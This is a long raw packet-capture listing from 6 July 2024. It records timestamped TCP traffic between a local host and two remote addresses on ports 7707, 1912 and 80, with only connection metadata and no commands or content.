                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.094660044 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.095285892 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.095350981 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.095366001 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.095443964 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.095454931 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.095465899 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.095479965 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.095494986 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.095568895 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.096189022 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.168668985 CEST8049803188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.169325113 CEST8049803188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.172168970 CEST4980380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175533056 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175581932 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175592899 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175611973 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175642967 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175661087 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175663948 CEST4980380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175668955 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175734043 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175740004 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175751925 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175760984 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175820112 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175945044 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175956011 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175965071 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175976038 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.175987005 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.176008940 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.176008940 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.176048040 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.176551104 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.176590919 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.176601887 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.176886082 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.182980061 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183031082 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183042049 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183058023 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183083057 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183110952 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183136940 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183168888 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183181047 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183199883 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183288097 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183303118 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183312893 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183324099 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183336020 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183355093 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183406115 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183455944 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183469057 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183595896 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183903933 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183974028 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.183985949 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.184070110 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.184082985 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.184096098 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.184124947 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.184251070 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.184954882 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.184967041 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.184978008 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185017109 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185045004 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185075998 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185111046 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185122013 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185133934 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185144901 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185161114 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185245037 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185297012 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185312986 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185338020 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185367107 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185415983 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185430050 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185498953 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185570002 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185580969 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185592890 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185605049 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185621977 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185717106 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185729027 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185739994 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185749054 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185794115 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.185794115 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.186444044 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.186456919 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.186467886 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.186763048 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.186774015 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.186925888 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.187979937 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188431978 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188478947 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188534021 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188546896 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188580036 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188596964 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188608885 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188608885 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188622952 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188651085 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188685894 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188698053 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188709021 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188715935 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.188787937 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.190043926 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.190246105 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.190355062 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.217988014 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.219683886 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.226346016 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267153025 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267174006 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267185926 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267292023 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267313957 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267337084 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267349005 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267360926 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267366886 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267385006 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267488003 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267499924 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267510891 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267523050 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267534971 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267549992 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267554998 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267579079 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267579079 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267821074 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267842054 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267853975 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267954111 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267956972 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267970085 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267980099 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.267992973 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268011093 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268073082 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268102884 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268174887 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268249989 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268261909 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268290043 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268369913 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268382072 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268395901 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268407106 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268407106 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268434048 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268471003 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268526077 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268537998 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268549919 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268563032 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268589020 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268657923 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268871069 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268882990 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268893003 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.268985987 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275600910 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275680065 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275691986 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275697947 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275805950 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275824070 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275836945 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275836945 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275847912 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275861025 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275872946 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275877953 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275877953 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275886059 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275954008 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275964022 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275974035 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275985003 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275985003 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.275998116 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276005983 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276019096 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276026964 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276031971 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276043892 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276046991 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276057005 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276068926 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276091099 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276165009 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276176929 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276186943 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276197910 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276206970 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276211977 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276223898 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276233912 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276241064 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276245117 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276259899 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276273012 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276283979 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276288986 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276297092 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276299000 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276324987 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276418924 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276626110 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276635885 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276648998 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276658058 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276674986 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.276736975 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.280617952 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.280637026 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.280647993 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.280716896 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.284493923 CEST4980480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.289388895 CEST8049804188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.289576054 CEST4980480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.289576054 CEST4980480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.294892073 CEST8049804188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.295018911 CEST4980480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.299765110 CEST8049804188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347084045 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347135067 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347146034 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347157001 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347219944 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347237110 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347249031 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347253084 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347276926 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347419977 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347430944 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347441912 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347501993 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347501993 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347542048 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347632885 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347644091 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347695112 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347706079 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347716093 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347727060 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347740889 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.347768068 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349548101 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349565983 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349577904 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349589109 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349601984 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349664927 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349668026 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349678040 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349708080 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349719048 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.349756956 CEST77074979794.232.249.204192.168.2.4
